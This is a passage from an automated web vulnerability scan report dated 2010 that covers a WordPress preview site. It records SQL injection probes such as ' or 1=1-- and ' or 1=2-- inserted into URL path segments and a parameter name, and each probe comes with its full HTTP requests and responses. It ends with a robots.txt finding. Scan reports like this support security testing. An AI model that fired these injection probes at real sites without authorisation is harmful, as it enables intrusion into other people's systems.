<p>You don't have permission to access /wp-content/themes15635519' or 1=1-- /core/js/jquery.cycle.all.2.72.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes15635519'%20or%201%3d2--%20/core/js/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:18 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.21. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/jquery.cycle.all.2.72.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13060627'%20or%201%3d1--%20 and 13060627'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core13060627'%20or%201%3d1--%20/js/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:28 GMT
Server: Apache
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core13060627' or 1=1-- /js/jquery.cycle.all.2.72.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core13060627'%20or%201%3d2--%20/js/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:28 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.22. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/jquery.cycle.all.2.72.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 17093617'%20or%201%3d1--%20 and 17093617'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core/js17093617'%20or%201%3d1--%20/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:38 GMT
Server: Apache
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core/js17093617' or 1=1-- /jquery.cycle.all.2.72.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core/js17093617'%20or%201%3d2--%20/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:38 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.23. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/jquery.cycle.all.2.72.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 14102076'%20or%201%3d1--%20 and 14102076'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core/js/jquery.cycle.all.2.72.js14102076'%20or%201%3d1--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:48 GMT
Server: Apache
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core/js/jquery.cycle.all.2.72.js14102076' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core/js/jquery.cycle.all.2.72.js14102076'%20or%201%3d2--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 08:09:49 GMT
Server: Apache
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wp-content/themes/core/js/jquery.cycle.all.2.72.js14102076' or 1=2-- was not found on this server.</p>
</body></html>

1.24. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/jquery.cycle.all.2.72.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 56529133%20or%201%3d1--%20 and 56529133%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core/js/jquery.cycle.all.2.72.js?156529133%20or%201%3d1--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:08:11 GMT
Server: Apache
Content-Length: 252
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core/js/jquery.cycle.all.2.72.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core/js/jquery.cycle.all.2.72.js?156529133%20or%201%3d2--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 08:08:11 GMT
Server: Apache
Last-Modified: Wed, 21 Jul 2010 02:34:22 GMT
ETag: "311159-ac8d-48bdca3ae0780"
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Thu, 15 Nov 2010 20:00:00 GMT
Content-Type: application/x-javascript
Content-Length: 44173

/*!
* jQuery Cycle Plugin (with Transition Definitions)
* Examples and documentation at: http://jquery.malsup.com/cycle/
* Copyright (c) 2007-2009 M. Alsup
* Version: 2.72 (09-SEP-2009)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
* Requires: jQuery v1.2.6 or later
*
* Originally based on the work of:
*    1) Matt Oakes
*    2) Torsten Baldes (http://medienfreunde.com/lab/innerfade/)
*    3) Benjamin Sterling (http://www.benjaminsterling.com/experiments/jqShuffle/)
*/
;(function($) {

var ver = '2.72';

// if $.support is not defined (pre jQuery 1.3) add what I need
if ($.support == undefined) {
   $.support = {
       opacity: !($.browser.msie)
   };
}

function debug(s) {
   if ($.fn.cycle.debug)
       log(s);
}        
function log() {
   if (window.console && window.console.log)
       window.console.log('[cycle] ' + Array.prototype.join.call(arguments,' '));
   //$('body').append('<div>'+Array.prototype.join.call(arguments,' ')+'</div>');
};

// the options arg can be...
// a number - indicates an immediate transition should occur to the given slide index
// a string - 'stop', 'pause', 'resume', or the name of a transition effect (ie, 'fade', 'zoom', etc)
// an object - properties to control the slideshow
//
// the arg2 arg can be...
// the name of an fx (only used in conjunction with a numeric value for 'options')
// the value true (only used in conjunction with a options == 'resume') and indicates
//     that the resume should occur immediately (not wait for next timeout)

$.fn.cycle = function(options, arg2) {
   var o = { s: this.selector, c: this.c
...[SNIP]...

2. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/jquery.cycle.all.2.72.js

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: alphanetsolutions.prontopreview.com

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 08:07:50 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 00:09:42 GMT
ETag: "2c2429-23-486fb64267d80"
Accept-Ranges: bytes
Content-Length: 35
Cache-Control: max-age=7200, must-revalidate
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

Report generated by Hoyt LLC Research at Sat Nov 20 08:17:44 CST 2010.